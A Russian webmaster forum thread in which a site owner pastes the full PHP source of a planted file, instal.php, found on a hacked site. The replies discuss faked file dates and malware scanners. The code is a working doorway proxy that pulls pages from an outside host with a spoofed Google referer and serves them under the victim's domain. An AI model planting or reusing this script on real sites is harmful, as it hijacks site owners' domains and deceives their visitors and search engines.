Взлом и перенаправление

malquem
На сайте с 14.06.2011
Offline
133
1183

Нашел файл instal.php

Загрузили аж 03/2014 и только сегодня гугл сообщил о редиректе

Гугл всегда долго соображает?)

<?php

$pathToDor = "/dat/";
$myHost = "d624.4work.pw";
$pathOnMyHost = "/";
$path = substr($_SERVER['REQUEST_URI'], strlen($pathToDor));

$html = getContent($myHost, $pathOnMyHost.$path);

if (strstr($path, ".css")) {
header('Content-Type: text/css; charset=utf-8');
}
elseif (strstr($path, ".png")) {
header('Content-Type: image/png');
}
elseif (strstr($path, ".jpg") || strstr($path, ".jpeg")) {
header('Content-Type: image/jpeg');
}
elseif (strstr($path, ".gif")) {
header('Content-Type: image/gif');
}
else {
header('Content-Type: text/html; charset=utf-8');
$html = str_replace($myHost.$pathOnMyHost,$_SERVER['HTTP_HOST'].$pathToDor,$html);
}

echo $html;


function getContent($host, $path)
{
$buff = '';
$socket = @fsockopen($host, 80, $errno, $errstr);
if ($socket) {

@fputs($socket, "GET {$path} HTTP/1.0\r\n");
@fputs($socket, "Host: {$host}\r\n");
@fputs($socket, "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\r\n");
@fputs($socket, "Referer: http://www.google.com\r\n");
@fputs($socket, "Connection: close\r\n\r\n");

while (!@feof($socket)) {
$buff .= @fgets($socket, 128);
}

@fclose($socket);
$result = explode("\r\n\r\n", $buff, 2);
return $result[1];
}else{
return "";
}
}
?>

После НГ советую проверить всё))

Все люди - братья, но не все братья - люди.
R
На сайте с 24.01.2008
Offline
180
#1

Не обязательно дата загруженного файла соответствует действительности.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
K
На сайте с 23.12.2014
Offline
5
#2
Rxp:
Не обязательно дата загруженного файла соответствует действительности.

Это точно. Как то приходилось сталкиваться с одним взломом, даты загруженных файлов стояли как у родных ( месяцев по 6 получалось).

А как загрузили файл? Взлом был или тут что-то другое?

WordPress для начинающих (http://belentsov.ru) Ваш личный помощник выполнит любую работу в ЛЮБОЕ время (http://www.work-zilla.com?ref=121253&sub=search)
CK
На сайте с 31.05.2008
Offline
97
#3

а где загружен был? Что за CMS?

NS
На сайте с 08.10.2011
Offline
29
#4

куда перенаправлял?

vga1
На сайте с 18.02.2007
Offline
251
#5

Ставьте айболит сканер

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий